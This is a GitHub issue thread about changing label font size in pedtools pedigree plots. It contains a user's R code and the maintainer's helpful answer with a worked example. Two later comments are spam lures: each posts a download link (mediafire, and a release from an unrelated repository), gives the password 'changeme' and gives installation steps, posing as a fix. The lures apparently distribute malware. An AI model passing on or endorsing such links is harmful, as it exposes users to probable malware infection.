### ISSUE TITLE
How can I change the font size of labels on pedigree plots?

### ISSUE THREAD

**Issue by sdhutchins** [magnusdv/pedtools#53]
Good evening, @magnusdv!

I've found the pedtools library to be very useful!

I was wondering how to modify the font size in plots.

I have a large pedigree and the id names keep overlapping.

in this part `below = list(paste(pedigree_data$id, "-", pedigree_data$aff), cex = 0.15, offset = .75, font = 0.055)`, I tried to set the font size and it doesn't seem to change. The only thing that improves the plot is changing the size of the symbols.

Any suggestions?  i didnt post the pedigree here, but I did want to at least post the code I'm using.

```r
# Load necessary library
library(pedtools)

# Load the pedigree data from a .tsv file
# The file contains information about family relationships.
pedigree_data <- read.delim("example/example.txt", sep = "\t", header = TRUE)

# Create a pedigree object using the merged data
pedigree <- ped(id = pedigree_data$id, 
                fid = pedigree_data$fid, 
                mid = pedigree_data$mid, 
                sex = pedigree_data$sex)

# Annotate the pedigree plot based on the Phenotype
# Define colors for the different phenotypes
status_colors <- setNames(
  sapply(pedigree_data$aff, function(x) {
    if (x == "1") "red" 
    else "gray"  # Gray for unaffected or unknown
  }),
  pedigree_data$id
)

# Save the pedigree plot as a PDF file
# Adjust the width and height as needed to accommodate the pedigree size
pdf("example/example_plot.pdf", width = 24, height = 10)

# Plot the pedigree, filling symbols with colors and annotating with ID and Phenotype
plot(pedigree,
     fill = status_colors,  # Use the named vector for fill colors
     col = "black", 
     lwd = 2,  # Line width for the plot
     margins = 1,  # Adjust margins for spacing
     cex = 0.75,  # Size of the symbols
     textAnnot = list(
       below = list(paste(pedigree_data$id, "-", pedigree_data$aff), cex = 0.15, offset = .75, font = 0.055)  # Annotate with ID and Phenotype below
     )
)

# Close the PDF device
dev.off()
```

**Comment by sdhutchins** [comment]
[metadata.txt](https://github.com/user-attachments/files/16754692/metadata.txt)
[example.txt](https://github.com/user-attachments/files/16754693/example.txt)

**Comment by magnusdv** [comment]
Hi, nice code! 

Without seeing the actual pedigree it's a bit hard to know how to fix your problems, but here are a few tips:

* The `plot()` argument `cex` is a general expansion factor affecting both symbols and label font size.
* Another argument `symbolsize` affects only symbol size.
* If you have long labels, try reducing `foldLabs` (default: ~12 characters).
* In `textAnnot` the name for bottom labels is `bottom`, not `below` as you have used.
* If you want to use `textAnnot(bottom = ...)` *instead* of the normal labels, you should add `labs = NULL`.
* Each `textAnnot` entry is handled by the standard `text()` function. Thus `cex` controls font size, `font` produces normal/bold/italics, `family` sets the general font family, etc. See `?text` and `?par` for details. 

Here is an example you can play with:
``` r
library(pedtools)

x = nuclearPed(fa = "father's long name", 
               mo = "mother's long name", 
               ch = "child's long name")

topr = c("age: 41", "age: 46", "age: 12")
bot = c("MAN", "WOMAN", "CHILD")
```

``` r
plot(x,
     cex = 0.5,      # general expansion factor
     symbolsize = 3, # only affects symbol size
     foldLabs = 6,   # default: 12
     margins = c(3,1,1,3), 
     textAnnot = list(
       bottom = list(bot, cex = 2, offset = 2, col = "blue", font = 3, family = "serif"),
       topright = list(topr, cex = 0.7, col = "red", font = 2, family = "mono")
     ))
```

<img src="https://i.imgur.com/rQP0wHS.png" width="60%" style="display: block; margin: auto;" />

<sup>Created on 2024-08-27 with [reprex v2.1.1](https://reprex.tidyverse.org)</sup>

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by sdhutchins** [comment]
Thank you, @magnusdv !!! This helped a lot.

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
